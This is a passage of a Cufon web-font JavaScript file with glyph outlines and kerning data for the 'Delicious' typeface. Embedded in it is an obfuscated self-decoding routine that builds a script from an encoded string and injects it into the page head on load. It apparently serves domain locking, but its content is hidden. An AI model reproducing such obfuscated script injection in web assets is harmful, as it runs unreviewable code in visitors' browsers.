"d":"165,-155v1,53,-50,91,-102,73r0,82r-40,0r0,-227v73,-2,142,-2,142,72xm125,-155v-1,-33,-30,-40,-62,-38r0,77v30,15,63,-8,62,-39","w":176,"k":{"o":4,"e":4,"c":4,"a":7,"A":15,".":52,",":52}},{"d":"114,20r-3,35v-61,-46,-98,-95,-98,-174v0,-68,40,-126,97,-161r4,32v-92,59,-90,207,0,268","w":120,"k":{"J":-7}},{"d":"140,-193r-42,13r38,58r-39,0r-22,-36r-23,36r-38,0r37,-58r-41,-13r0,-34r48,20r-12,-39r56,0r-10,39r48,-20r0,34","w":152},{"d":"127,-270r-92,321r-34,0r92,-321r34,0","w":128,"k":{"\/":36}},{"d":"170,-96v0,43,-12,101,-67,101v-15,0,-30,-5,-37,-18r0,76r-38,0r0,-239r38,0r0,13v4,-4,19,-19,39,-19v45,0,65,47,65,86xm131,-93v0,-20,-3,-55,-30,-55v-15,0,-27,10,-35,18v1,44,-10,103,35,103v27,0,30,-47,30,-66","w":185},{"d":"73,-199v-28,7,-21,46,0,56r0,-56xm89,-31v22,-10,19,-44,0,-54r0,54xm89,-133v30,21,55,29,55,74v0,33,-23,58,-55,63r0,22r-16,0r0,-21v-18,-1,-40,-10,-53,-22r18,-28v9,7,24,16,35,17r0,-68v-26,-15,-58,-39,-58,-76v0,-34,25,-57,58,-60r0,-20r16,0r0,21v18,2,38,12,49,27r-21,21v-7,-8,-18,-13,-28,-16r0,66","w":156},{"d":"50,-259v10,27,2,58,-2,88r-22,0v-3,-30,-12,-60,-3,-88r27,0","w":74},{"d":"180,0r-40,0r-22,-65r-52,0r-21,65r-41,0r72,-227r32,0xm109,-100r-17,-70r-17,70r34,0","w":183,"k":{"y":9,"w":9,"v":9,"Y":20,"W":6,"V":10,"T":14}},{"d":"143,-36v-1,65,-58,98,-121,95r0,-28v37,0,83,-18,83,-61v0,-38,-50,-26,-78,-18r10,-128r97,0r0,32r-63,0r-3,57v40,-8,75,11,75,51"},{"d":"153,-88v0,46,-22,93,-72,93v-97,-1,-96,-187,0,-187v50,0,72,44,72,94xm117,-88v0,-36,-14,-60,-36,-60v-22,0,-36,24,-36,60v0,32,14,60,36,60v22,0,36,-17,36,-60"},{"d":"88,-182v96,3,97,184,0,187v-97,-3,-96,-184,0,-187xm122,-88v0,-32,-13,-61,-34,-61v-21,0,-34,29,-34,61v0,32,13,61,34,61v21,0,34,-29,34,-61","w":175},{"d":"147,0r-121,0r-7,-28v27,-15,84,-66,84,-99v0,-36,-55,-19,-72,-2r-8,-30v33,-35,118,-33,118,30v0,39,-31,75,-62,95r68,0r0,34"},{"d":"98,-259v10,27,2,58,-2,88r-22,0v-3,-30,-12,-61,-2,-88r26,0xm51,-259v10,27,2,58,-2,88r-22,0v-3,-30,-12,-60,-3,-88r27,0","w":124},{"d":"151,-80v0,43,-21,85,-69,85v-52,0,-67,-56,-67,-98v0,-68,48,-112,105,-140r14,26v-32,20,-56,36,-73,72v43,-24,90,10,90,55xm114,-81v0,-33,-36,-40,-60,-26v-5,30,-2,80,30,80v28,0,30,-33,30,-54"},{"d":"100,-221r-17,25v-26,-14,-52,-30,-73,-51r30,-31v16,22,38,41,60,57","w":121},{"d":"75,-22v0,30,-53,38,-52,4v0,-15,12,-27,27,-27v14,0,25,9,25,23xm78,-249v50,-2,56,66,25,92v-17,25,-43,44,-37,90r-33,0v-13,-68,37,-84,53,-134v2,-25,-32,-17,-49,-12r0,-30v13,-4,27,-6,41,-6","w":128},{"d":"73,-22v0,15,-12,27,-27,27v-14,0,-25,-9,-25,-23v0,-30,53,-38,52,-4","w":92,"k":{"Q":9,"O":9,"G":9,"C":9}},{"d":"179,-113v0,56,-24,113,-88,113r-65,0r0,-227r68,0v65,0,85,59,85,114xm139,-112v0,-31,-4,-81,-46,-81r-28,0r0,159r26,0v42,0,48,-46,48,-78","w":196},{"d":"181,-182r-2,35r-30,0r-5,39r23,0r-3,35r-25,0r-9,72r-33,0r10,-72r-27,0r-9,63r-33,0r9,-63r-30,0r5,-35r30,0r5,-39r-25,0r5,-35r24,0r7,-67r33,0r-8,67r27,0r7,-61r33,0r-7,61r28,0xm116,-147r-27,0r-5,39r27,0","w":200},{"d":"171,0r-40,0r0,-100r-65,0r0,100r-39,0r0,-227r39,0r0,91r65,0r0,-91r40,0r0,227","w":197},{"d":"61,0r-37,0r0,-176r37,0r0,176xm68,-222v1,30,-50,33,-50,2v-1,-30,50,-33,50,-2","w":85},{"d":"168,0r-36,0r-67,-83r0,83r-38,0r0,-250r38,0r0,131r50,-57r46,0r-65,75r72,87r0,14","w":169},{"d":"160,-176v-17,60,-38,119,-65,176r-28,0r-64,-176r41,0r38,122v16,-40,29,-80,38,-122r40,0","k":{".":27,",":27}},{"d":"156,-74r-56,0r0,59r-31,0r0,-59r-55,0r0,-32r55,0r0,-59r31,0r0,59r56,0r0,32","w":169},{"d":"103,-39r-26,21r-71,-72r71,-72r25,21r-52,51","w":108},{"d":"170,-15v-16,13,-42,20,-63,20v-66,0,-88,-62,-88,-118v0,-53,28,-119,89,-119v18,0,43,5,58,16r-15,27v-12,-7,-30,-10,-43,-10v-33,0,-50,56,-50,87v0,32,8,84,50,84v14,0,32,-5,44,-14","w":178,"k":{",":9}},{"d":"190,-138v0,35,8,58,-32,58v-31,0,-52,-24,-74,-24v-22,0,-34,23,-34,23v0,-35,-6,-49,34,-57v28,0,51,23,74,23v22,0,32,-23,32,-23","w":239},{"d":"62,0r-39,0r0,-227r39,0r0,227","w":85},{"d":"158,-98r-143,0r0,-33r143,0r0,33xm158,-48r-143,0r0,-32r143,0r0,32","w":172},{"d":"78,-14v-13,25,-31,50,-51,70r-22,-16v12,-19,28,-40,23,-66v17,-16,41,-7,50,12","w":92,"k":{"Q":9,"O":9,"C":9}},{"d":"239,0r-40,0r0,-125r3,-26r-52,151r-33,0r-52,-151v6,45,2,101,3,151r-40,0r0,-227r47,0r59,174v16,-59,40,-117,59,-174r46,0r0,227","w":267},{"d":"169,-22r-11,27v-14,4,-37,-11,-35,-27v-35,58,-107,11,-107,-58v0,-50,15,-102,70,-102v15,0,34,6,34,6r0,-74r37,0r0,213v0,11,1,15,12,15xm84,-27v42,-7,36,-67,36,-116v0,0,-19,-6,-32,-6v-29,0,-33,36,-33,65v0,17,4,55,29,57","w":184},{"d":"179,-113v0,53,-22,118,-80,118v-59,0,-81,-65,-81,-118v0,-53,23,-119,81,-119v58,0,80,66,80,119xm140,-113v0,-35,-8,-85,-41,-85v-33,0,-42,50,-42,85v0,35,9,84,42,84v33,0,41,-49,41,-84","w":197,"k":{"T":7,".":9,",":9}},{"d":"191,-76v28,-3,46,-38,45,-70v0,-56,-38,-84,-91,-84v-55,0,-95,51,-95,103v0,100,136,137,193,65r19,17v-30,35,-68,50,-113,50v-74,0,-133,-59,-133,-133v0,-69,60,-132,130,-132v72,0,122,40,122,114v0,45,-35,93,-83,93v-14,0,-30,-10,-31,-25v-11,9,-32,21,-46,21v-25,0,-31,-33,-31,-52v0,-55,52,-120,100,-76r3,-10r30,0r-26,109v0,5,2,10,7,10xm172,-162v-7,-4,-20,-11,-28,-11v-25,0,-36,47,-36,69v0,8,2,18,11,18v9,0,30,-12,38,-17","w":285},{"d":"77,-14v-13,25,-31,50,-51,70r-22,-16v12,-19,28,-40,23,-66v17,-16,41,-7,50,12xm76,-125v0,15,-13,27,-28,27v-14,0,-24,-10,-24,-24v0,-15,12,-27,27,-27v14,0,25,10,25,24","w":92},{"d":"173,0r-38,0r-72,-159v6,41,2,111,3,159r-39,0r0,-227r46,0r50,115v6,13,11,32,11,32r0,-147r39,0r0,227","w":199},{"d":"142,-191r-50,0r0,191r-39,0r0,-191r-49,0r0,-36r138,0r0,36","w":145,"k":{"y":8,"w":9,"u":16,"s":16,"r":16,"o":23,"i":10,"e":23,"c":23,"a":23,"T":-6,"Q":7,"O":7,"G":7,"C":7,"A":14,";":33,":":33,".":33,"-":27,",":33}},{"d":"154,0r-21,0r0,50r-36,0r0,-50r-85,0r-2,-29v21,-53,53,-101,87,-147r37,0r0,143r20,0r0,33xm97,-33r0,-88v-18,27,-36,56,-48,88r48,0"},{"d":"143,-176v1,-24,-1,-44,-27,-44v-16,0,-30,5,-30,23v0,26,32,20,57,21xm140,-145v-53,-8,-84,14,-84,58v0,11,2,62,17,62v7,-2,28,-30,53,-19r-7,25v-22,-5,-22,24,-46,24v-43,0,-59,-56,-59,-91v0,-36,18,-76,57,-82v-50,-25,-5,-81,40,-81v40,0,73,23,66,73r34,0r0,31r-34,0r0,105v-2,18,20,15,30,9r9,25v-30,22,-76,10,-76,-33r0,-106","w":226},{"d":"163,-3v-21,15,-53,8,-57,-18v-20,42,-92,31,-92,-24v0,-11,5,-26,10,-36r78,-33v2,-20,-1,-35,-21,-35v-16,0,-35,10,-46,21r-13,-22v26,-40,118,-49,118,19r0,102v-1,8,8,13,13,7xm66,-26v25,0,39,-30,37,-56r-51,21v-5,15,-4,35,14,35","w":167},{"d":"102,-90r-71,72r-26,-21r52,-51r-51,-51r25,-21","w":108},{"d":"92,-182v37,0,14,21,15,41v0,0,-11,-6,-20,-6v-9,0,-23,16,-23,16r0,131r-38,0r0,-176r38,0r0,13v0,0,16,-19,28,-19","w":114,"k":{"o":2,"e":2,"c":2,".":33,"-":6,",":33}},{"d":"140,-176v4,87,-32,175,-76,239r-32,-16v36,-51,71,-127,73,-190r-84,0r0,-33r119,0"},{"d":"204,-113r-38,0r-54,-98r-54,98r-38,0r79,-144r26,0","w":224},{"d":"144,-19v-14,13,-38,24,-57,24v-48,0,-72,-49,-72,-91v0,-44,23,-96,73,-96v18,0,40,8,52,22r-19,22v-8,-7,-22,-12,-33,-12v-25,0,-35,40,-35,60v0,21,8,63,36,63v13,0,32,-10,42,-18","w":148},{"d":"171,-213r-16,28v-13,-9,-33,-14,-48,-14v-36,0,-50,58,-50,87v0,40,20,101,75,81r0,-73r37,0r0,99v-18,8,-42,10,-62,10v-66,0,-89,-61,-89,-118v0,-54,27,-119,89,-119v20,0,48,6,64,19","w":188,"k":{",":9}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+267-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("4(hk-_?gtoDX4)GC,_1I6(6D5L?kh_DX5LUItoE.heBTzVgZA9Gk65>GoLkZhrPwoc],UeDD-PU4e5EzeVGCt)kot&>9-G?A25,(pa?_=1GN5^?3~e{kAa[HAPey4)>NfrWcUgPkA(BI5)6LzaBXE)?6to]L4V{apccDfPkcKgWCKGygU_P:N&,~zgNZf.?l-(Gg4)6Z49{>$KWTNaW[)aP1(^6U4fA?=$yE9K2eo5zht-N,~pwHZ&cG_.j>R+T]Xul{IVgkLr3MQCBD:SkZf.WT-aklf_{G-_,gt){.$o6XhZM.-^Glt^AD~rgCtozjzZMutVgu5ZwS=.,r,klX4KBj$V>T-L?H-(HuNrEBz_eT-(1Z-LDZzoUG5)M&-Lg>U)D>f.EGNryj-(D&z5E>-L3Xt(DV,(MH-o2>4ohuNZwCtK{T=IT+t9G.oL?-tek,$5[-tekD49w>")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":162,"face":{"font-family":"delicious","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-1 -280 268 71","underline-thickness":"7.2","underline-position":"-46.8","stemh":"32","stemv":"38","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * -4.0, I1995 Jos Buivenga
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"125,-121v25,1,39,19,39,43v0,74,-81,98,-149,74r36,-222v54,1,115,-12,116,46v0,25,-17,52,-42,59xm139,-177v0,-32,-33,-27,-63,-27r-12,73v42,4,74,-9,75,-46xm135,-76v-1,-39,-40,-31,-74,-32r-13,84v41,15,88,-7,87,-52","w":178},{"d":"198,-115r-25,0r-61,-111r-61,111r-25,0v41,-71,76,-140,76,-140r20,0v0,0,34,67,76,140","w":224},{"d":"173,-215v-63,45,-76,132,-91,215r-28,0r13,-80v-2,-39,-14,-107,-51,-130r19,-20v30,22,49,62,49,109v8,-44,38,-91,72,-112","w":155,"k":{"s":7,"q":14,"o":16,"e":16,"c":16,"a":16,"Y":-10,"A":11,";":25,":":25,".":25,"-":18,",":25}},{"d":"150,-147v0,32,-35,50,-59,63v24,0,47,16,47,42v0,67,-64,102,-124,102r-4,-20v41,-1,100,-26,100,-75v0,-34,-43,-27,-72,-25r-2,-21v25,2,49,-23,67,-32v19,-9,31,-46,0,-46v-13,0,-40,12,-52,18r-7,-17v29,-22,106,-45,106,11"},{"d":"162,49r-162,0r0,-22r162,0r0,22"},{"d":"12,-36r17,14r67,-68r-66,-68r-17,14r53,54","w":108},{"d":"73,5v-41,0,-57,-37,-57,-73v0,-48,32,-114,87,-114v41,0,57,38,57,74v0,48,-32,113,-87,113xm133,-111v0,-22,-7,-49,-34,-49v-41,0,-56,63,-56,95v0,22,7,49,34,49v41,0,56,-63,56,-95","w":176},{"d":"94,6v-19,0,-36,-9,-41,-28r-14,85r-27,0r29,-188r-25,14r3,-19r26,-16r5,-30r27,0r-2,13v13,-8,36,-19,51,-19v36,0,51,33,51,64v0,47,-26,124,-83,124xm148,-117v0,-19,-5,-43,-28,-43v-12,0,-37,14,-48,20v-5,42,-33,124,23,124v39,0,53,-71,53,-101","w":192},{"d":"120,53r-22,0r-94,-326r23,0","w":120},{"d":"160,-176r-22,154v0,9,10,11,17,7r4,13v-26,19,-61,-4,-46,-37v-10,22,-41,44,-65,44v-27,0,-32,-27,-32,-49v0,-52,31,-138,94,-138v17,0,33,3,50,6xm132,-157v-62,-20,-85,71,-87,111v0,9,1,27,14,27v54,0,68,-79,73,-138","w":176},{"d":"170,-171r-37,234r-28,0r14,-85v-11,18,-29,28,-50,28v-38,0,-53,-32,-53,-66v0,-50,30,-122,88,-122v32,0,66,11,66,11xm140,-154v0,0,-19,-5,-29,-5v-50,0,-66,56,-66,96v0,19,5,47,29,47v59,0,55,-84,66,-138","w":186},{"d":"230,-179v7,25,8,54,-4,76r-57,103r-29,0v-5,-47,-15,-93,-13,-144v-13,52,-38,97,-57,144r-30,0r-26,-176r29,0r18,143r57,-143r28,0r16,143v17,-42,62,-81,41,-140","w":238,"k":{".":18,",":18}},{"d":"94,-161v-35,0,-50,41,-51,74v-1,34,42,36,67,25v-15,13,-19,24,-42,24v-33,0,-56,-24,-50,-60v7,-44,30,-84,79,-84v50,0,59,53,50,98v-14,68,-63,111,-124,139r-9,-17v54,-25,109,-79,109,-149v0,-19,-4,-50,-29,-50"},{"d":"144,-177v-6,52,-8,101,-34,139v18,3,30,20,30,41v0,44,-55,66,-92,66v-20,0,-55,-4,-55,-31v0,-27,35,-56,57,-69r12,17v-12,8,-41,32,-41,47v0,14,17,17,28,17v23,0,64,-16,64,-44v0,-19,-16,-29,-34,-29r-1,-8v11,-13,26,-31,30,-48v-24,38,-89,29,-89,-26v0,-66,59,-89,125,-72xm118,-159v-44,-15,-74,16,-72,52v0,15,8,27,25,27v34,0,46,-42,47,-79","w":159},{"d":"62,-9v-14,22,-35,42,-55,59r-15,-14v14,-15,35,-39,32,-61v17,-10,32,2,38,16","w":92,"k":{"T":18,"Q":11,"O":11,"C":11}},{"d":"21,-82v0,-88,75,-190,166,-135r-15,19v-74,-45,-122,48,-122,116v0,31,11,65,47,65v10,0,23,-1,33,-5r11,-75r27,0r-15,93v-18,7,-41,10,-60,10v-53,0,-72,-41,-72,-88","w":186},{"d":"175,-170v0,41,-29,79,-70,87r56,74r-2,9r-28,0r-61,-83v-4,-1,-8,-3,-12,-5r-14,88r-29,0r36,-227v60,-1,124,-5,124,57xm145,-166v-1,-35,-33,-40,-68,-38r-15,92v38,25,84,-14,83,-54","w":179,"k":{"o":2,"e":2,"c":2,"Y":5,"V":4,"T":5}},{"d":"161,-226r-4,25r-56,0r-32,201r-28,0r32,-201r-55,0r4,-25r139,0","w":140,"k":{"y":8,"w":9,"u":16,"s":16,"r":16,"o":23,"i":10,"e":23,"c":23,"a":23,"T":-4,"Q":7,"O":7,"G":7,"C":7,"A":14,";":18,":":18,".":18,"-":27,",":18}},{"d":"168,-227r-4,24r-88,0r-11,72r67,0r-3,25r-68,0r-13,81r92,0r-4,25r-121,0r36,-227r117,0","w":160},{"d":"143,-179v10,28,7,56,-7,79r-60,100r-28,0r-36,-176r30,0r25,145v19,-43,73,-80,49,-142","w":152,"k":{".":18,",":18}},{"d":"187,-219r-74,101r52,118r-33,0r-39,-90r-66,90r-26,0r0,-8r80,-108r-48,-111r32,0r37,83r61,-83r24,0r0,8","w":178},{"d":"58,-17v1,26,-44,30,-44,2v0,-12,11,-22,23,-22v12,0,21,8,21,20","w":92,"k":{"Q":11,"O":11,"G":11,"C":11}},{"d":"60,-17v1,26,-44,30,-44,2v0,-12,11,-22,23,-22v12,0,21,8,21,20xm91,-252v-21,59,-25,127,-37,194r-22,0v9,-66,9,-135,31,-190","w":90},{"d":"71,-176r-29,176r-26,0r28,-176r27,0xm87,-228v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2","w":84},{"d":"51,6r-22,0r0,-278r22,0r0,278","w":79},{"d":"144,-179v14,47,-31,66,-51,91r42,88r-30,0r-32,-68r-53,68r-24,0r0,-7r66,-84r-39,-85r30,0r29,67v14,-18,49,-31,36,-65","w":151},{"d":"190,-130v-3,26,-11,48,-38,45v-35,-4,-80,-48,-103,-4v3,-25,13,-46,39,-44v35,3,79,47,102,3","w":200},{"d":"235,0r-27,0r22,-143v0,-12,-6,-16,-18,-16v-19,0,-45,28,-55,43r-18,116r-27,0r22,-142v0,-13,-8,-17,-20,-17v-19,0,-43,30,-53,45r-18,114r-27,0r28,-176r27,0r-5,33v9,-16,38,-39,57,-39v23,0,41,12,39,37v10,-17,33,-37,54,-37v29,0,45,16,40,48","w":277},{"d":"151,-207r-17,14v-21,-29,-76,-18,-75,22v0,44,79,45,79,103v0,67,-85,95,-129,53r15,-20v27,29,85,16,85,-26v0,-41,-80,-46,-80,-102v0,-65,87,-92,122,-44","w":154},{"d":"134,-165r-21,24v-16,-28,-38,8,-51,23r-19,118r-27,0r28,-176r28,0r-6,32v12,-23,50,-58,68,-21","w":125,"k":{"o":4,"e":4,"c":4,"a":6,".":33,"-":6,",":33}},{"w":108},{"d":"192,-227v-21,91,-4,228,-109,233v-51,2,-65,-45,-57,-94r22,-139r29,0r-24,164v0,23,7,45,34,45v38,0,49,-39,54,-70r22,-139r29,0","w":195},{"d":"261,-227r-36,227r-29,0r32,-185r-92,185r-25,0r-39,-186v-6,65,-19,124,-28,186r-29,0r36,-227r39,0r39,192v28,-67,63,-128,94,-192r38,0","w":267},{"w":108},{"d":"127,-246v-59,-10,-43,55,-54,96v-5,19,-17,38,-34,47v38,25,8,80,8,127v0,20,18,14,35,15r-7,19v-36,5,-59,-9,-49,-46v3,-35,28,-95,-13,-107r3,-17v74,-13,0,-167,110,-153","w":127,"k":{"J":-7}},{"d":"155,-148v0,-25,-6,-60,-38,-60v-52,0,-68,91,-68,131v0,25,6,59,38,59v53,0,68,-90,68,-130xm83,6v-49,0,-62,-49,-62,-89v0,-56,31,-149,100,-149v48,0,62,48,62,88v0,57,-31,150,-100,150","w":196,"k":{"T":7,".":9,",":9}},{"d":"145,-179v9,24,11,52,-3,72v-42,60,-63,149,-138,174r-7,-18v25,-10,41,-26,55,-49r-37,-176r29,0r26,146v18,-36,44,-64,56,-105v0,-12,-4,-28,-8,-39","w":155,"k":{".":18,",":18}},{"d":"142,-258v-96,50,-137,216,-46,287r-11,14v-112,-86,-55,-266,57,-322r0,21","w":126,"k":{"J":-7}},{"d":"193,-227r-36,227r-29,0r-56,-186v-6,65,-19,124,-28,186r-29,0r36,-227r38,0r50,173v6,-61,18,-115,26,-173r28,0","w":199},{"d":"144,0r-27,0r22,-144v0,-11,-5,-15,-16,-15v-25,0,-51,25,-62,46r-18,113r-27,0r28,-176r27,0r-5,33v11,-18,39,-39,63,-39v30,0,43,17,37,48","w":186},{"d":"96,-36r-17,14r-67,-68r66,-68r17,14r-53,54","w":108},{"d":"114,-176r-3,20r-35,0r-19,120v-4,31,29,19,42,7r8,17v-24,25,-86,25,-78,-23r20,-121r-24,-3r3,-17r25,0r5,-32r26,0r-6,32r36,0","w":121},{"d":"141,-157r-15,13v-19,-21,-69,-24,-75,10v9,38,76,31,76,79v0,62,-80,76,-119,39r14,-18v21,22,74,27,78,-13v-8,-41,-78,-31,-77,-79v0,-61,89,-74,118,-31","w":148},{"d":"121,-159v-23,1,-50,27,-60,46r-18,113r-27,0r39,-250r28,0r-17,107v13,-19,39,-39,63,-39v65,0,28,85,24,131v-3,26,-13,39,-31,57r-16,-14v29,-32,33,-85,33,-136v0,-12,-6,-15,-18,-15","w":183},{"d":"271,-227v3,43,-6,71,-20,100r-63,127r-29,0v-4,-61,-11,-122,-12,-183r-70,183r-31,0r-17,-227r30,0r10,161v1,8,0,16,-1,24r71,-185r29,0r12,185v19,-61,66,-100,60,-185r31,0","w":267,"k":{";":4,":":4,".":18,",":20}},{"d":"175,-170v1,64,-59,107,-117,81r-14,89r-29,0r36,-227v61,-1,122,-5,124,57xm145,-166v-1,-35,-32,-40,-68,-38r-15,92v40,23,85,-9,83,-54","w":174,"k":{"o":4,"e":4,"c":4,"a":4,"A":13,".":52,",":52}},{"d":"292,-124v0,77,-78,129,-149,129v-63,0,-122,-40,-122,-108v0,-62,52,-114,112,-124r3,20v-52,12,-100,66,-82,128r55,-45v29,-24,123,-90,46,-116r7,-15v23,5,55,23,49,51v-24,56,-105,104,-149,144v56,101,241,18,196,-97r-31,0r-3,-12v35,-19,68,0,68,45","w":316},{"d":"126,-22r-3,22r-108,0r36,-227r28,0r-33,205r80,0","w":134,"k":{"y":10,"Y":23,"W":13,"V":16,"T":16}},{"d":"-4,29v86,-48,143,-211,45,-287r6,-21v84,56,83,180,24,260v-20,27,-41,46,-68,64","w":122},{"d":"17,-22v42,-25,92,-62,104,-114v-5,-37,-54,-22,-73,-5r-9,-18v33,-29,111,-40,111,22v0,44,-57,93,-92,113r80,0r-4,24r-116,0"},{"d":"82,-250r-32,211v0,9,1,26,5,35r-25,7v-17,-87,19,-170,25,-253r27,0","w":87},{"d":"91,-218r-14,16v-38,-22,-59,-46,-59,-46r26,-23v0,0,15,27,47,53","w":91},{"d":"59,-103v31,-3,78,-13,78,-44v0,-11,-9,-14,-18,-13r-2,-22v27,-5,50,6,50,33v0,37,-41,55,-73,56r65,93r-34,0r-67,-98r-16,98r-26,0r39,-250r27,0","w":172},{"d":"155,-214r-13,19v-9,-7,-21,-11,-32,-13r-13,82v22,16,42,27,42,58v0,37,-27,66,-63,72r-3,22r-16,0r3,-21v-17,0,-38,-6,-52,-15r11,-21v12,7,30,13,44,14r14,-85v-23,-16,-46,-29,-46,-61v0,-38,29,-67,66,-69r3,-20r17,0r-4,21v14,1,32,8,42,17xm94,-209v-38,4,-45,59,-12,73xm80,-20v32,-9,43,-56,11,-72","w":154},{"d":"91,-184v0,-15,-12,-27,-27,-27v-15,0,-26,12,-26,27v0,15,11,26,26,26v15,0,27,-11,27,-26xm64,-232v17,-1,32,12,51,11v39,-3,35,-17,59,-6r-80,227r-24,0r76,-210v-14,7,-38,7,-38,7v13,27,-11,67,-44,67v-26,0,-47,-22,-47,-48v0,-26,21,-48,47,-48xm234,-42v0,26,-22,47,-48,47v-26,0,-47,-21,-47,-47v0,-26,21,-48,47,-48v26,0,48,22,48,48xm213,-42v0,-15,-12,-27,-27,-27v-15,0,-26,12,-26,27v0,15,11,26,26,26v15,0,27,-11,27,-26","w":251},{"d":"61,-9v-14,22,-35,42,-55,59r-15,-14v14,-15,35,-39,32,-61v17,-10,32,2,38,16xm80,-127v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2","w":92},{"d":"154,-176v-10,89,-63,180,-118,241r-18,-16v46,-50,95,-135,106,-202r-92,0r4,-23r118,0"},{"d":"89,-81r-69,0r0,-22r69,0r0,22","w":108},{"d":"149,-90v0,51,-30,96,-81,96v-40,0,-51,-37,-51,-70v0,-81,56,-136,126,-167r7,18v-55,27,-105,73,-108,150v0,20,8,47,32,47v34,0,47,-39,48,-73v0,-34,-42,-38,-66,-25v14,-13,21,-24,42,-24v29,0,51,18,51,48"},{"d":"60,-255v6,32,-9,54,-15,80r-12,-1v1,-28,0,-60,10,-79r17,0","w":53},{"d":"105,-264r-51,320r-55,0r3,-21r33,0r44,-278r-33,0r3,-21r56,0","w":104},{"d":"79,5v-43,0,-63,-32,-63,-72v0,-55,31,-115,92,-115v12,0,26,5,33,15v5,-26,11,-57,-2,-78r22,-9v31,52,-4,125,-9,186v-3,40,-29,73,-73,73xm138,-144v-7,-10,-20,-16,-32,-16v-47,0,-62,59,-62,96v0,24,9,48,37,48v56,0,42,-82,57,-128","w":180},{"d":"80,-227r-38,237v-5,29,-33,43,-59,49r-3,-20v16,-5,31,-13,34,-31r37,-235r29,0","w":85},{"d":"140,-199r-49,19r26,55r-24,0r-20,-42r-35,42r-20,-6r43,-51r-46,-16r9,-22r45,18r-7,-41r43,0r-18,44r48,-20","w":142},{"d":"87,-228v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2xm70,-176r-31,197v-3,29,-34,41,-58,48r-3,-19v14,-5,32,-16,35,-32r31,-194r26,0","w":84},{"d":"58,-17v1,26,-44,30,-44,2v0,-12,11,-22,23,-22v12,0,21,8,21,20xm76,-126v0,12,-11,22,-23,22v-11,0,-21,-9,-21,-21v0,-12,11,-22,23,-22v12,0,21,9,21,21","w":92},{"d":"117,-100r7,-55r-41,0r-7,55r41,0xm135,-243r22,0r-8,64r30,0r-2,24r-32,0r-6,55r27,0r-3,23r-27,0r-10,74r-21,0r9,-74r-41,0r-9,67r-21,0r8,-67r-29,0r4,-23r28,0r7,-55r-25,0r3,-24r25,0r9,-71r22,0r-9,71r41,0","w":200},{"d":"12,-46v1,-34,24,-62,53,-72v-57,-27,-19,-109,42,-109v27,0,49,11,49,41v0,32,-22,53,-50,65v81,29,27,127,-40,127v-31,0,-54,-20,-54,-52xm131,-183v0,-19,-13,-24,-30,-24v-41,-1,-54,65,-15,77v24,-10,45,-23,45,-53xm73,-15v39,1,67,-61,29,-81v-7,-4,-14,-9,-21,-13v-22,11,-42,31,-42,57v0,20,13,37,34,37"},{"d":"150,-176r-24,153r23,0r-4,23r-23,0v-5,21,-10,42,-22,60r-20,-9v8,-17,12,-33,16,-51r-90,0r2,-23v33,-54,71,-104,113,-153r29,0xm119,-140v-28,35,-59,76,-84,117r64,0"},{"d":"171,-176r-25,156v0,4,2,7,6,7v-5,6,-7,14,-13,18v-21,0,-25,-22,-17,-39v-14,19,-39,39,-64,39v-29,0,-42,-17,-37,-47r21,-134r27,0r-22,144v0,12,7,15,17,15v25,0,48,-25,61,-44r18,-115r28,0","w":182},{"d":"167,0r-29,0r-11,-73r-69,0r-36,73r-30,0r108,-227r31,0xm123,-97r-12,-100r-43,100r55,0","w":185,"k":{"y":9,"w":9,"v":9,"Y":16,"V":10,"T":14}},{"d":"21,-82v0,-87,74,-190,165,-135r-13,18v-77,-41,-123,48,-123,117v0,31,11,65,47,65v17,0,37,-6,51,-16r10,18v-18,13,-44,21,-66,21v-52,0,-71,-42,-71,-88","w":177},{"d":"146,-176r-3,22v-39,42,-75,86,-110,131r101,0r-3,23r-127,0r1,-26v33,-45,69,-87,107,-128r-92,0r3,-22r123,0","w":148},{"d":"180,-227v0,40,1,72,-15,101r-69,126r-33,0r-38,-227r32,0r28,192v26,-58,74,-101,65,-192r30,0","w":174,"k":{"y":-4,";":4,":":4,".":18,",":18}},{"d":"152,-143v0,45,-72,63,-107,70v-1,26,5,57,32,57v18,0,38,-13,50,-26r11,15v-18,19,-40,32,-67,32v-39,0,-55,-35,-55,-69v0,-53,32,-118,92,-118v25,0,44,12,44,39xm122,-145v0,-12,-10,-15,-20,-15v-30,0,-50,40,-55,65v25,-5,75,-17,75,-50","w":157},{"d":"157,-227r-3,25r-118,177r111,0r-4,25r-139,0r0,-24r117,-178r-81,0r2,-25r115,0","w":159},{"d":"106,-112r-3,17v-73,14,-1,167,-110,153r-1,-19v82,10,18,-118,88,-142v-38,-26,-11,-82,-8,-128v1,-19,-19,-15,-35,-15r7,-19v37,-5,59,10,49,46v-2,37,-30,94,13,107","w":110},{"d":"77,0r-62,0r36,-227r66,0v49,0,68,35,68,80v0,65,-32,147,-108,147xm156,-146v0,-30,-9,-58,-44,-58r-36,0r-28,181r33,0v59,0,75,-77,75,-123","w":198},{"d":"110,-264r-4,21r-33,0r-44,278r33,0r-3,21r-56,0r51,-320r56,0","w":103,"k":{"J":-7}},{"d":"110,-255v6,32,-9,54,-15,80r-12,-1v1,-29,-2,-61,10,-79r17,0xm60,-255v6,32,-9,54,-15,80r-12,-1v1,-28,0,-60,10,-79r17,0","w":102},{"d":"191,-227r-36,227r-29,0r17,-106r-82,0r-17,106r-29,0r36,-227r29,0r-15,96r82,0r15,-96r29,0","w":197},{"d":"150,-273r-145,326r-22,0r144,-326r23,0","w":132,"k":{"\/":36}},{"d